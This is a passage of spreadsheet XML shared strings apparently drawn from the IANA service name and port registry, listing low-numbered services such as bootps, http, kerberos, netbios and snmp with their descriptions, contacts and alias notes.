    <t>whoispp</t>
  </si>
  <si>
    <t>whois++
IANA assigned this well-formed service name as a replacement for "whois++".</t>
  </si>
  <si>
    <t>[Rickard_Schoultz]</t>
  </si>
  <si>
    <t>whois++</t>
  </si>
  <si>
    <t>This entry is an alias to "whoispp".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>covia</t>
  </si>
  <si>
    <t>Communications Integrator (CI)</t>
  </si>
  <si>
    <t>[Dan_Smith]</t>
  </si>
  <si>
    <t>tacacs-ds</t>
  </si>
  <si>
    <t>TACACS-Database Service</t>
  </si>
  <si>
    <t>[Kathy_Huber]</t>
  </si>
  <si>
    <t>sql-net</t>
  </si>
  <si>
    <t>Oracle SQL*NET
IANA assigned this well-formed service name as a replacement for "sql*net".</t>
  </si>
  <si>
    <t>[Jack_Haverty]</t>
  </si>
  <si>
    <t>sql*net</t>
  </si>
  <si>
    <t>Oracle SQL*NET</t>
  </si>
  <si>
    <t>This entry is an alias to "sql-net".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>bootps</t>
  </si>
  <si>
    <t>Bootstrap Protocol Server</t>
  </si>
  <si>
    <t>[Bill_Croft]</t>
  </si>
  <si>
    <t>[RFC951]</t>
  </si>
  <si>
    <t>Defined TXT keys: None</t>
  </si>
  <si>
    <t>bootpc</t>
  </si>
  <si>
    <t>Bootstrap Protocol Client</t>
  </si>
  <si>
    <t>tftp</t>
  </si>
  <si>
    <t>Trivial File Transfer</t>
  </si>
  <si>
    <t>[David_Clark]</t>
  </si>
  <si>
    <t>gopher</t>
  </si>
  <si>
    <t>Gopher</t>
  </si>
  <si>
    <t>[Mark_McCahill]</t>
  </si>
  <si>
    <t>netrjs-1</t>
  </si>
  <si>
    <t>Remote Job Service</t>
  </si>
  <si>
    <t>netrjs-2</t>
  </si>
  <si>
    <t>netrjs-3</t>
  </si>
  <si>
    <t>netrjs-4</t>
  </si>
  <si>
    <t>[Bob_Braden]</t>
  </si>
  <si>
    <t>any private dial out service</t>
  </si>
  <si>
    <t>deos</t>
  </si>
  <si>
    <t>Distributed External Object Store</t>
  </si>
  <si>
    <t>any private RJE service</t>
  </si>
  <si>
    <t>vettcp</t>
  </si>
  <si>
    <t>[Christopher_Leong]</t>
  </si>
  <si>
    <t>finger</t>
  </si>
  <si>
    <t>Finger</t>
  </si>
  <si>
    <t>[David_Zimmerman]</t>
  </si>
  <si>
    <t>Unauthorized use by some mail users (see [RFC4146] for details)</t>
  </si>
  <si>
    <t>http</t>
  </si>
  <si>
    <t>World Wide Web HTTP</t>
  </si>
  <si>
    <t>Defined TXT keys: u=&lt;username&gt; p=&lt;password&gt; path=&lt;path to document&gt;</t>
  </si>
  <si>
    <t>www</t>
  </si>
  <si>
    <t>This is a duplicate of the "http" service and should not be used for discovery purposes.</t>
  </si>
  <si>
    <t>www-http</t>
  </si>
  <si>
    <t>[Tim_Berners_Lee]</t>
  </si>
  <si>
    <t>This is a duplicate of the "http" service and should not be used for discovery purposes.
      u=&lt;username&gt; p=&lt;password&gt; path=&lt;path to document&gt;
        (see txtrecords.html#http)
        Known Subtypes: _printer
        NOTE: The meaning of this service type, though called just "http", actually
        denotes something more precise than just "any data transported using HTTP".
        The DNS-SD service type "http" should only be used to advertise content that:
        * is served over HTTP,
        * can be displayed by "typical" web browser client software, and
        * is intented primarily to be viewed by a human user.
        Of course, the definition of "typical web browser" is subjective, and may
        change over time, but for practical purposes the DNS-SD service type "http"
        can be understood as meaning "human-readable HTML content served over HTTP".
        In some cases other widely-supported content types may also be appropriate,
        such as plain text over HTTP, or JPEG image over HTTP.
        Content types not intented primarily for viewing by a human user, or not
        widely-supported in web browsing clients, should not be advertised as
        DNS-SD service type "http", even if they do happen to be transported over HTTP.
        Such types should be advertised as their own logical service type with their
        own DNS-SD service type, for example, XUL (XML User Interface Language)
        transported over HTTP is advertised explicitly as DNS-SD service type "xul-http".</t>
  </si>
  <si>
    <t>This is a duplicate of the "http" service and should not be used for discovery purposes.
      u=&lt;username&gt; p=&lt;password&gt; path=&lt;path to document&gt;
      (see txtrecords.html#http)
      Known Subtypes: _printer
      NOTE: The meaning of this service type, though called just "http", actually
      denotes something more precise than just "any data transported using HTTP".
      The DNS-SD service type "http" should only be used to advertise content that:
      * is served over HTTP,
      * can be displayed by "typical" web browser client software, and
      * is intented primarily to be viewed by a human user.
      Of course, the definition of "typical web browser" is subjective, and may
      change over time, but for practical purposes the DNS-SD service type "http"
      can be understood as meaning "human-readable HTML content served over HTTP".
      In some cases other widely-supported content types may also be appropriate,
      such as plain text over HTTP, or JPEG image over HTTP.
      Content types not intented primarily for viewing by a human user, or not
      widely-supported in web browsing clients, should not be advertised as
      DNS-SD service type "http", even if they do happen to be transported over HTTP.
      Such types should be advertised as their own logical service type with their
      own DNS-SD service type, for example, XUL (XML User Interface Language)
      transported over HTTP is advertised explicitly as DNS-SD service type "xul-http".</t>
  </si>
  <si>
    <t>xfer</t>
  </si>
  <si>
    <t>XFER Utility</t>
  </si>
  <si>
    <t>[Thomas_M_Smith]</t>
  </si>
  <si>
    <t>mit-ml-dev</t>
  </si>
  <si>
    <t>MIT ML Device</t>
  </si>
  <si>
    <t>[David_Reed]</t>
  </si>
  <si>
    <t>ctf</t>
  </si>
  <si>
    <t>Common Trace Facility</t>
  </si>
  <si>
    <t>[Hugh_Thomas]</t>
  </si>
  <si>
    <t>mfcobol</t>
  </si>
  <si>
    <t>Micro Focus Cobol</t>
  </si>
  <si>
    <t>[Simon_Edwards]</t>
  </si>
  <si>
    <t>any private terminal link</t>
  </si>
  <si>
    <t>kerberos</t>
  </si>
  <si>
    <t>Kerberos</t>
  </si>
  <si>
    <t>[B_Clifford_Neuman]</t>
  </si>
  <si>
    <t>su-mit-tg</t>
  </si>
  <si>
    <t>SU/MIT Telnet Gateway</t>
  </si>
  <si>
    <t>[Mark_Crispin]</t>
  </si>
  <si>
    <t>dnsix</t>
  </si>
  <si>
    <t>DNSIX Securit Attribute Token Map</t>
  </si>
  <si>
    <t>[Charles_Watt]</t>
  </si>
  <si>
    <t>PORT 90 also being used unofficially by Pointcast</t>
  </si>
  <si>
    <t>mit-dov</t>
  </si>
  <si>
    <t>MIT Dover Spooler</t>
  </si>
  <si>
    <t>[Eliot_Moss]</t>
  </si>
  <si>
    <t>npp</t>
  </si>
  <si>
    <t>Network Printing Protocol</t>
  </si>
  <si>
    <t>[Louis_Mamakos]</t>
  </si>
  <si>
    <t>dcp</t>
  </si>
  <si>
    <t>Device Control Protocol</t>
  </si>
  <si>
    <t>[Daniel_Tappan]</t>
  </si>
  <si>
    <t>objcall</t>
  </si>
  <si>
    <t>Tivoli Object Dispatcher</t>
  </si>
  <si>
    <t>[Tom_Bereiter]</t>
  </si>
  <si>
    <t>supdup</t>
  </si>
  <si>
    <t>SUPDUP</t>
  </si>
  <si>
    <t>dixie</t>
  </si>
  <si>
    <t>DIXIE Protocol Specification</t>
  </si>
  <si>
    <t>[Tim_Howes]</t>
  </si>
  <si>
    <t>swift-rvf</t>
  </si>
  <si>
    <t>Swift Remote Virtural File Protocol</t>
  </si>
  <si>
    <t>[Maurice_R_Turcotte]</t>
  </si>
  <si>
    <t>tacnews</t>
  </si>
  <si>
    <t>TAC News</t>
  </si>
  <si>
    <t>metagram</t>
  </si>
  <si>
    <t>Metagram Relay</t>
  </si>
  <si>
    <t>[Geoff_Goodfellow]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on 100</t>
  </si>
  <si>
    <t>NIC Host Name Server</t>
  </si>
  <si>
    <t>iso-tsap</t>
  </si>
  <si>
    <t>ISO-TSAP Class 0</t>
  </si>
  <si>
    <t>[Marshall_Rose]</t>
  </si>
  <si>
    <t>gppitnp</t>
  </si>
  <si>
    <t>Genesis Point-to-Point Trans Net</t>
  </si>
  <si>
    <t>acr-nema</t>
  </si>
  <si>
    <t>ACR-NEMA Digital Imag. &amp; Comm. 300</t>
  </si>
  <si>
    <t>[Patrick_McNamee]</t>
  </si>
  <si>
    <t>cso</t>
  </si>
  <si>
    <t>CCSO name server protocol</t>
  </si>
  <si>
    <t>[Martin_Hamilton]</t>
  </si>
  <si>
    <t>csnet-ns</t>
  </si>
  <si>
    <t>Mailbox Name Nameserver</t>
  </si>
  <si>
    <t>[Marvin_Solomon]</t>
  </si>
  <si>
    <t>3com-tsmux</t>
  </si>
  <si>
    <t>3COM-TSMUX</t>
  </si>
  <si>
    <t>[Jeremy_Siegel]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on 106</t>
  </si>
  <si>
    <t>rtelnet</t>
  </si>
  <si>
    <t>Remote Telnet Service</t>
  </si>
  <si>
    <t>snagas</t>
  </si>
  <si>
    <t>SNA Gateway Access Server</t>
  </si>
  <si>
    <t>[Kevin_Murphy]</t>
  </si>
  <si>
    <t>pop2</t>
  </si>
  <si>
    <t>Post Office Protocol - Version 2</t>
  </si>
  <si>
    <t>[Joyce_K_Reynolds]</t>
  </si>
  <si>
    <t>pop3</t>
  </si>
  <si>
    <t>Post Office Protocol - Version 3</t>
  </si>
  <si>
    <t>sunrpc</t>
  </si>
  <si>
    <t>SUN Remote Procedure Call</t>
  </si>
  <si>
    <t>[Chuck_McManis]</t>
  </si>
  <si>
    <t>mcidas</t>
  </si>
  <si>
    <t>McIDAS Data Transmission Protocol</t>
  </si>
  <si>
    <t>[Glenn_Davis]</t>
  </si>
  <si>
    <t>ident</t>
  </si>
  <si>
    <t>auth</t>
  </si>
  <si>
    <t>Authentication Service</t>
  </si>
  <si>
    <t>[Mike_St_Johns]</t>
  </si>
  <si>
    <t>unassigned</t>
  </si>
  <si>
    <t>Deprecated June 2004</t>
  </si>
  <si>
    <t>sftp</t>
  </si>
  <si>
    <t>Simple File Transfer Protocol</t>
  </si>
  <si>
    <t>ansanotify</t>
  </si>
  <si>
    <t>ANSA REX Notify</t>
  </si>
  <si>
    <t>[Nicola_J_Howarth]</t>
  </si>
  <si>
    <t>uucp-path</t>
  </si>
  <si>
    <t>UUCP Path Service</t>
  </si>
  <si>
    <t>sqlserv</t>
  </si>
  <si>
    <t>SQL Services</t>
  </si>
  <si>
    <t>[Larry_Barnes]</t>
  </si>
  <si>
    <t>nntp</t>
  </si>
  <si>
    <t>Network News Transfer Protocol</t>
  </si>
  <si>
    <t>[RFC3977]</t>
  </si>
  <si>
    <t>cfdptkt</t>
  </si>
  <si>
    <t>CFDPTKT</t>
  </si>
  <si>
    <t>[John_Ioannidis]</t>
  </si>
  <si>
    <t>erpc</t>
  </si>
  <si>
    <t>Encore Expedited Remote Pro.Call</t>
  </si>
  <si>
    <t>[Jack_ONeil]</t>
  </si>
  <si>
    <t>smakynet</t>
  </si>
  <si>
    <t>SMAKYNET</t>
  </si>
  <si>
    <t>[Pierre_Arnaud]</t>
  </si>
  <si>
    <t>ntp</t>
  </si>
  <si>
    <t>Network Time Protocol</t>
  </si>
  <si>
    <t>[Dave_Mills]</t>
  </si>
  <si>
    <t>[RFC5905]</t>
  </si>
  <si>
    <t>ansatrader</t>
  </si>
  <si>
    <t>ANSA REX Trader</t>
  </si>
  <si>
    <t>locus-map</t>
  </si>
  <si>
    <t>Locus PC-Interface Net Map Ser</t>
  </si>
  <si>
    <t>[Eric_Peterson]</t>
  </si>
  <si>
    <t>nxedit</t>
  </si>
  <si>
    <t>NXEdit</t>
  </si>
  <si>
    <t>[Don_Payette]</t>
  </si>
  <si>
    <t>Port 126 Previously assigned to application below
unitary         126/tcp    Unisys Unitary Login
unitary         126/udp    Unisys Unitary Login
&lt;feil&amp;kronos.nisd.cam.unisys.com&gt;
Port 126 Previously assigned to application above</t>
  </si>
  <si>
    <t>locus-con</t>
  </si>
  <si>
    <t>Locus PC-Interface Conn Server</t>
  </si>
  <si>
    <t>gss-xlicen</t>
  </si>
  <si>
    <t>GSS X License Verification</t>
  </si>
  <si>
    <t>[John_Light]</t>
  </si>
  <si>
    <t>pwdgen</t>
  </si>
  <si>
    <t>Password Generator Protocol</t>
  </si>
  <si>
    <t>[Frank_J_Wacho]</t>
  </si>
  <si>
    <t>cisco-fna</t>
  </si>
  <si>
    <t>cisco FNATIVE</t>
  </si>
  <si>
    <t>cisco-tna</t>
  </si>
  <si>
    <t>cisco TNATIVE</t>
  </si>
  <si>
    <t>cisco-sys</t>
  </si>
  <si>
    <t>cisco SYSMAINT</t>
  </si>
  <si>
    <t>statsrv</t>
  </si>
  <si>
    <t>Statistics Service</t>
  </si>
  <si>
    <t>[Dave_Mills_2]</t>
  </si>
  <si>
    <t>ingres-net</t>
  </si>
  <si>
    <t>INGRES-NET Service</t>
  </si>
  <si>
    <t>[Mike_Berrow]</t>
  </si>
  <si>
    <t>epmap</t>
  </si>
  <si>
    <t>DCE endpoint resolution</t>
  </si>
  <si>
    <t>[Joe_Pato]</t>
  </si>
  <si>
    <t>profile</t>
  </si>
  <si>
    <t>PROFILE Naming System</t>
  </si>
  <si>
    <t>[Larry_Peterson]</t>
  </si>
  <si>
    <t>netbios-ns</t>
  </si>
  <si>
    <t>NETBIOS Name Service</t>
  </si>
  <si>
    <t>netbios-dgm</t>
  </si>
  <si>
    <t>NETBIOS Datagram Service</t>
  </si>
  <si>
    <t>netbios-ssn</t>
  </si>
  <si>
    <t>NETBIOS Session Service</t>
  </si>
  <si>
    <t>emfis-data</t>
  </si>
  <si>
    <t>EMFIS Data Service</t>
  </si>
  <si>
    <t>emfis-cntl</t>
  </si>
  <si>
    <t>EMFIS Control Service</t>
  </si>
  <si>
    <t>[Gerd_Beling]</t>
  </si>
  <si>
    <t>bl-idm</t>
  </si>
  <si>
    <t>Britton-Lee IDM</t>
  </si>
  <si>
    <t>[Susie_Snitzer]</t>
  </si>
  <si>
    <t>imap</t>
  </si>
  <si>
    <t>Internet Message Access Protocol</t>
  </si>
  <si>
    <t>[RFC3501]</t>
  </si>
  <si>
    <t>uma</t>
  </si>
  <si>
    <t>Universal Management Architecture</t>
  </si>
  <si>
    <t>[Jay_Whitney]</t>
  </si>
  <si>
    <t>uaac</t>
  </si>
  <si>
    <t>UAAC Protocol</t>
  </si>
  <si>
    <t>[David_A_Gomberg]</t>
  </si>
  <si>
    <t>iso-tp0</t>
  </si>
  <si>
    <t>ISO-IP0</t>
  </si>
  <si>
    <t>iso-ip</t>
  </si>
  <si>
    <t>ISO-IP</t>
  </si>
  <si>
    <t>jargon</t>
  </si>
  <si>
    <t>Jargon</t>
  </si>
  <si>
    <t>[Bill_Weinman]</t>
  </si>
  <si>
    <t>aed-512</t>
  </si>
  <si>
    <t>AED 512 Emulation Service</t>
  </si>
  <si>
    <t>[Albert_G_Broscius]</t>
  </si>
  <si>
    <t>SQL-NET</t>
  </si>
  <si>
    <t>[Martin_Picard]</t>
  </si>
  <si>
    <t>hems</t>
  </si>
  <si>
    <t>HEMS</t>
  </si>
  <si>
    <t>bftp</t>
  </si>
  <si>
    <t>Background File Transfer Program</t>
  </si>
  <si>
    <t>[Annette_DeSchon]</t>
  </si>
  <si>
    <t>sgmp</t>
  </si>
  <si>
    <t>SGMP</t>
  </si>
  <si>
    <t>[Marty_Schoffstahl]</t>
  </si>
  <si>
    <t>netsc-prod</t>
  </si>
  <si>
    <t>NETSC</t>
  </si>
  <si>
    <t>netsc-dev</t>
  </si>
  <si>
    <t>[Sergio_Heker]</t>
  </si>
  <si>
    <t>sqlsrv</t>
  </si>
  <si>
    <t>SQL Service</t>
  </si>
  <si>
    <t>[Craig_Rogers]</t>
  </si>
  <si>
    <t>knet-cmp</t>
  </si>
  <si>
    <t>KNET/VM Command/Message Protocol</t>
  </si>
  <si>
    <t>[Gary_S_Malkin]</t>
  </si>
  <si>
    <t>pcmail-srv</t>
  </si>
  <si>
    <t>PCMail Server</t>
  </si>
  <si>
    <t>[Mark_L_Lambert]</t>
  </si>
  <si>
    <t>nss-routing</t>
  </si>
  <si>
    <t>NSS-Routing</t>
  </si>
  <si>
    <t>[Yakov_Rekhter]</t>
  </si>
  <si>
    <t>sgmp-traps</t>
  </si>
  <si>
    <t>SGMP-TRAPS</t>
  </si>
  <si>
    <t>snmp</t>
  </si>
  <si>
    <t>SNMP</t>
  </si>
  <si>
    <t>snmptrap</t>
  </si>
  <si>
    <t>SNMPTRAP</t>
  </si>
  <si>
    <t>cmip-man</t>
  </si>
  <si>
    <t>CMIP/TCP Manager</t>
  </si>
  <si>
    <t>cmip-agent</t>
  </si>
  <si>
    <t>CMIP/TCP Agent</t>
  </si>
  <si>
    <t>[Amatzia_Ben_Artzi]</t>
  </si>
  <si>
    <t>xns-courier</t>
  </si>
  <si>
    <t>Xerox</t>
  </si>
  <si>
    <t>[Susie_Armstrong_2]</t>
  </si>
  <si>
    <t>s-net</t>
  </si>
  <si>
    <t>Sirius Systems</t>
  </si>
  <si>
    <t>[Brian_Lloyd]</t>
  </si>
  <si>
    <t>namp</t>
  </si>
  <si>
    <t>NAMP</t>
  </si>
  <si>
    <t>rsvd</t>
  </si>
  <si>
    <t>RSVD</t>
  </si>
  <si>
    <t>[Alan_Sandell]</t>
  </si>
  <si>
    <t>send</t>
  </si>
  <si>
    <t>SEND</t>
  </si>
  <si>
    <t>[William_Oldwin]</t>
  </si>
  <si>
    <t>print-srv</t>
  </si>
  <si>
    <t>Network PostScript</t>
  </si>
  <si>
    <t>[Brian_Reid]</t>
  </si>
  <si>
    <t>multiplex</t>
  </si>
  <si>
    <t>Network Innovations Multiplex</t>
  </si>
  <si>
    <t>cl-1</t>
  </si>
  <si>
    <t>Network Innovations CL/1
IANA assigned this well-formed service name as a replacement for "cl/1".</t>
  </si>
  <si>
    <t>[Kevin_DeVault]</t>
  </si>
  <si>
    <t>cl/1</t>
  </si>
  <si>
    <t>Network Innovations CL/1</t>
  </si>
  <si>
    <t>This entry is an alias to "cl-1".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>xyplex-mux</t>
  </si>
  <si>
    <t>Xyplex</t>
  </si>
  <si>
    <t>[Bob_Stewart]</t>
  </si>
  <si>
    <t>mailq</t>
  </si>
  <si>
    <t>MAILQ</t>
  </si>
  <si>
    <t>[Rayan_Zachariassen]</t>
  </si>
  <si>
    <t>vmnet</t>
  </si>
  <si>
    <t>VMNET</t>
  </si>
  <si>
    <t>[Christopher_Tengi]</t>
  </si>
  <si>
    <t>genrad-mux</t>
  </si>
  <si>
    <t>GENRAD-MUX</t>
  </si>
  <si>
    <t>[Ron_Thornton]</t>
  </si>
  <si>
    <t>xdmcp</t>
  </si>
  <si>
    <t>X Display Manager Control Protocol</t>
  </si>
  <si>
    <t>[Robert_W_Scheifler]</t>
  </si>
  <si>
    <t>nextstep</t>
  </si>
  <si>
    <t>NextStep Window Server</t>
  </si>
  <si>
    <t>[Leo_Hourvitz]</t>
  </si>
  <si>
    <t>bgp</t>
  </si>
  <si>
    <t>Border Gateway Protocol</t>
  </si>
  <si>
    <t>[Kirk_Lougheed]</t>
  </si>
  <si>
    <t>BGP</t>
  </si>
  <si>
    <t>ris</t>
  </si>
  <si>
    <t>Intergraph</t>
  </si>
  <si>
    <t>[Dave_Buehmann]</t>
  </si>
  <si>
    <t>unify</t>
  </si>
  <si>
    <t>Unify</t>
  </si>
  <si>
    <t>[Daegis_Inc]</t>
  </si>
  <si>
    <t>[Chris_Anderson]</t>
  </si>
  <si>
    <t>audit</t>
  </si>
  <si>
    <t>Unisys Audit SITP</t>
  </si>
  <si>
    <t>[Gil_Greenbaum]</t>
  </si>
  <si>
    <t>ocbinder</t>
  </si>
  <si>
    <t>OCBinder</t>
  </si>
  <si>
    <t>ocserver</t>
  </si>
  <si>
    <t>OCServer</t>
  </si>
  <si>
    <t>[Jerrilynn_Okamura]</t>
  </si>
  <si>
    <t>remote-kis</t>
  </si>
  <si>
    <t>Remote-KIS</t>
  </si>
  <si>
    <t>kis</t>
  </si>
  <si>
    <t>KIS Protocol</t>
  </si>
  <si>
    <t>[Ralph_Droms]</t>
  </si>
  <si>
    <t>aci</t>
  </si>
  <si>
    <t>Application Communication Interface</t>
  </si>
  <si>
    <t>[Rick_Carlos]</t>
  </si>
  <si>
    <t>mumps</t>
  </si>
  <si>
    <t>Plus Five's MUMPS</t>
  </si>
  <si>
    <t>[Hokey_Stenn]</t>
  </si>
  <si>
    <t>qft</t>
  </si>
  <si>
    <t>Queued File Transport</t>
  </si>
  <si>
    <t>[Wayne_Schroeder]</t>
  </si>
  <si>
    <t>gacp</t>
  </si>
  <si>
    <t>Gateway Access Control Protocol</t>
  </si>
  <si>
    <t>[C_Philip_Wood]</t>
  </si>
  <si>
    <t>prospero</t>
  </si>
  <si>
    <t>Prospero Directory Service</t>
  </si>
  <si>
    <t>osu-nms</t>
  </si>
  <si>
    <t>OSU Network Monitoring System</t>
  </si>
  <si>
    <t>[Doug_Karl]</t>
  </si>
  <si>
    <t>srmp</t>
  </si>
  <si>
    <t>Spider Remote Monitoring Protocol</t>
  </si>
  <si>
    <t>[Ted_J_Socolofsky]</t>
  </si>
  <si>
    <t>irc</t>
  </si>
  <si>
    <t>Internet Relay Chat Protocol</t>
  </si>
  <si>
    <t>[Jarkko_Oikarinen]</t>
  </si>
  <si>
    <t>dn6-nlm-aud</t>
  </si>
  <si>
    <t>DNSIX Network Level Module Audit</t>
  </si>
  <si>
    <t>dn6-smm-red</t>
  </si>
  <si>
    <t>DNSIX Session Mgt Module Audit Redir</t>
  </si>
  <si>
    <t>[Lawrence_Lebahn]</t>
  </si>
  <si>
    <t>dls</t>
  </si>
  <si>
    <t>Directory Location Service</t>
  </si>
  <si>
    <t>dls-mon</t>
  </si>
  <si>
    <t>Directory Location Service Monitor</t>
  </si>
  <si>
    <t>[Scott_Bellew]</t>
  </si>
  <si>
    <t>smux</t>
  </si>
  <si>
    <t>SMUX</t>
  </si>
  <si>
    <t>src</t>
  </si>
  <si>
    <t>IBM System Resource Controller</t>
  </si>
  <si>
    <t>[Gerald_McBrearty]</t>
  </si>
  <si>
    <t>at-rtmp</t>
  </si>
  <si>
    <t>AppleTalk Routing Maintenance</t>
  </si>
  <si>
    <t>at-nbp</t>
  </si>
  <si>
    <t>AppleTalk Name Binding</t>
  </si>
  <si>
    <t>at-3</t>
  </si>
  <si>
    <t>AppleTalk Unused</t>
  </si>
  <si>
    <t>at-echo</t>
  </si>
  <si>
    <t>AppleTalk Echo</t>
  </si>
  <si>
    <t>at-5</t>
  </si>
  <si>
    <t>at-zis</t>
  </si>
  <si>
    <t>AppleTalk Zone Information</t>
  </si>
  <si>
    <t>at-7</t>
  </si>
  <si>
    <t>at-8</t>
  </si>
  <si>
    <t>[Rob_Chandhok]</t>
  </si>
  <si>
    <t>qmtp</t>
  </si>
  <si>
    <t>The Quick Mail Transfer Protocol</t>
  </si>
  <si>
    <t>[D_J_Bernstein]</t>
  </si>
  <si>
    <t>z39-50</t>
  </si>
  <si>
    <t>ANSI Z39.50
IANA assigned this well-formed service name as a replacement for "z39.50".</t>
  </si>
  <si>
    <t>[Mark_H_Needleman]</t>
  </si>
  <si>
    <t>z39.50</t>
  </si>
  <si>
    <t>ANSI Z39.50</t>
  </si>
  <si>
    <t>This entry is an alias to "z39-50".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>914c-g</t>
  </si>
  <si>
    <t>Texas Instruments 914C/G Terminal
IANA assigned this well-formed service name as a replacement for "914c/g".</t>
  </si>
  <si>
    <t>[Bill_Harrell]</t>
  </si>
  <si>
    <t>914c/g</t>
  </si>
  <si>
    <t>Texas Instruments 914C/G Terminal</t>
  </si>
  <si>
    <t>This entry is an alias to "914c-g".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>anet</t>
  </si>
  <si>
    <t>ATEXSSTR</t>
  </si>
  <si>
    <t>[Jim_Taylor]</t>
  </si>
  <si>
    <t>ipx</t>
  </si>
  <si>
    <t>IPX</t>
  </si>
  <si>
    <t>[Don_Provan]</t>
  </si>
  <si>
    <t>vmpwscs</t>
  </si>
  <si>
    <t>VM PWSCS</t>
  </si>
  <si>
    <t>[Dan_Shia]</t>
  </si>
  <si>
    <t>softpc</t>
  </si>
  <si>
    <t>Insignia Solutions</t>
  </si>
  <si>
    <t>[Martyn_Thomas]</t>
  </si>
  <si>
    <t>CAIlic</t>
  </si>
  <si>
    <t>Computer Associates Int'l License Server</t>
  </si>
  <si>
    <t>[Chuck_Spitz]</t>
  </si>
  <si>
    <t>dbase</t>
  </si>
  <si>
    <t>dBASE Unix</t>
  </si>
  <si>
    <t>[Don_Gibson]</t>
  </si>
  <si>
    <t>mpp</t>
  </si>
  <si>
    <t>Netix Message Posting Protocol</t>
  </si>
  <si>
    <t>[Shannon_Yeh]</t>
  </si>
  <si>
    <t>uarps</t>
  </si>
  <si>
    <t>Unisys ARPs</t>
  </si>
  <si>
    <t>[Ashok_Marwaha]</t>
  </si>
  <si>
    <t>imap3</t>
  </si>
  <si>
    <t>Interactive Mail Access Protocol v3</t>
  </si>
  <si>
    <t>[James_Rice]</t>
  </si>
  <si>
    <t>fln-spx</t>
  </si>
  <si>
    <t>Berkeley rlogind with SPX auth</t>
  </si>
  <si>
    <t>rsh-spx</t>
  </si>
  <si>
    <t>Berkeley rshd with SPX auth</t>
  </si>
  <si>
    <t>cdc</t>
  </si>
  <si>
    <t>Certificate Distribution Center</t>
  </si>
  <si>
    <t>[Kannan_Alagappan]</t>
  </si>
  <si>
    <t>masqdialer</t>
  </si>
  <si>
    <t>[Charles_Wright]</t>
  </si>
  <si>
    <t>Possible Conflict of Port 222 with "Masqdialer"</t>
  </si>
  <si>
    <t>225-241</t>
  </si>
  <si>
    <t>direct</t>
  </si>
  <si>
    <t>Direct</t>
  </si>
  <si>
    <t>[Herb_Sutter]</t>
  </si>
  <si>
    <t>[Paul_Horton]</t>
  </si>
  <si>
    <t>sur-meas</t>
  </si>
  <si>
    <t>Survey Measurement</t>
  </si>
  <si>
    <t>[Dave_Clark]</t>
  </si>
  <si>
    <t>inbusiness</t>
  </si>
  <si>
    <t>[Derrick_Hisatake]</t>
  </si>
  <si>
    <t>link</t>
  </si>
  <si>
    <t>LINK</t>
  </si>
  <si>
    <t>dsp3270</t>
  </si>
  <si>
    <t>Display Systems Protocol</t>
  </si>
  <si>
    <t>[Weldon_J_Showalter]</t>
  </si>
  <si>
    <t>subntbcst-tftp</t>
  </si>
  <si>
    <t>SUBNTBCST_TFTP
IANA assigned this well-formed service name as a replacement for "subntbcst_tftp".</t>
  </si>
  <si>
    <t>[John_Fake]</t>
  </si>
  <si>
    <t>subntbcst_tftp</t>
  </si>
  <si>
    <t>SUBNTBCST_TFTP</t>
  </si>
  <si>
    <t>This entry is an alias to "subntbcst-tftp".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>bhfhs</t>
  </si>
  <si>
    <t>[John_Kelly]</t>
  </si>
  <si>
    <t>249-255</t>
  </si>
  <si>
    <t>RAP</t>
  </si>
  <si>
    <t>[J_S_Greenfield]</t>
  </si>
  <si>
    <t>set</t>
  </si>
  <si>
    <t>Secure Electronic Transaction</t>
  </si>
  <si>
    <t>[Donald_Eastlake]</t>
  </si>
  <si>
    <t>esro-gen</t>
  </si>
  <si>
    <t>Efficient Short Remote Operations</t>
  </si>
  <si>
    <t>[Mohsen_Banan]</t>
  </si>
  <si>
    <t>openport</t>
  </si>
  <si>
    <t>Openport</t>
  </si>
  <si>
    <t>[John_Marland]</t>
  </si>
  <si>
    <t>nsiiops</t>
  </si>
  <si>
    <t>IIOP Name Service over TLS/SSL</t>
  </si>
  <si>
    <t>[Jeff_Stewart]</t>
  </si>
  <si>
    <t>arcisdms</t>
  </si>
  <si>
    <t>Arcisdms</t>
  </si>
  <si>
    <t>[Russell_Crook]</t>
  </si>
  <si>
    <t>hdap</t>
  </si>
  <si>
    <t>HDAP</t>
  </si>
  <si>
    <t>[Troy_Gau]</t>
  </si>
  <si>
    <t>bgmp</t>
  </si>
  <si>
    <t>BGMP</t>
  </si>
  <si>
    <t>[Dave_Thaler]</t>
  </si>
  <si>
    <t>x-bone-ctl</t>
  </si>
  <si>
    <t>X-Bone CTL</t>
  </si>
  <si>
    <t>[Joe_Touch]</t>
  </si>
  <si>
    <t>sst</t>
  </si>
  <si>
    <t>SCSI on ST</t>
  </si>
  <si>
    <t>[Donald_D_Woelz]</t>
  </si>
  <si>
    <t>td-service</t>
  </si>
  <si>
    <t>Tobit David Service Layer</t>
  </si>
  <si>
    <t>td-replica</t>
  </si>
  <si>
    <t>Tobit David Replica</t>
  </si>
  <si>
    <t>[Franz_Josef_Leuders]</t>
  </si>
  <si>
    <t>manet</t>
  </si>
  <si>
    <t>MANET Protocols</t>
  </si>
  <si>
    <t>[RFC5498]</t>
  </si>
  <si>
    <t>gist</t>
  </si>
  <si>
    <t>Q-mode encapsulation for GIST messages</t>
  </si>
  <si>
    <t>[RFC5971]</t>
  </si>
  <si>
    <t>pt-tls</t>
  </si>
  <si>
    <t>IETF Network Endpoint Assessment (NEA) Posture Transport Protocol over TLS (PT-TLS)</t>
  </si>
  <si>
    <t>[RFC6876]</t>
  </si>
  <si>
    <t>272-279</t>
  </si>
  <si>
    <t>http-mgmt</t>
  </si>
  <si>
    <t>[Adrian_Pell]</t>
  </si>
  <si>
    <t>personal-link</t>
  </si>
  <si>
    <t>Personal Link</t>
  </si>
  <si>
    <t>[Dan_Cummings]</t>
  </si>
  <si>
    <t>cableport-ax</t>
  </si>
  <si>
    <t>Cable Port A/X</t>
  </si>
  <si>
    <t>[Craig_Langfahl]</t>
  </si>
  <si>
    <t>rescap</t>
  </si>
  <si>
    <t>[Paul_Hoffman]</t>
  </si>
  <si>
    <t>corerjd</t>
  </si>
  <si>
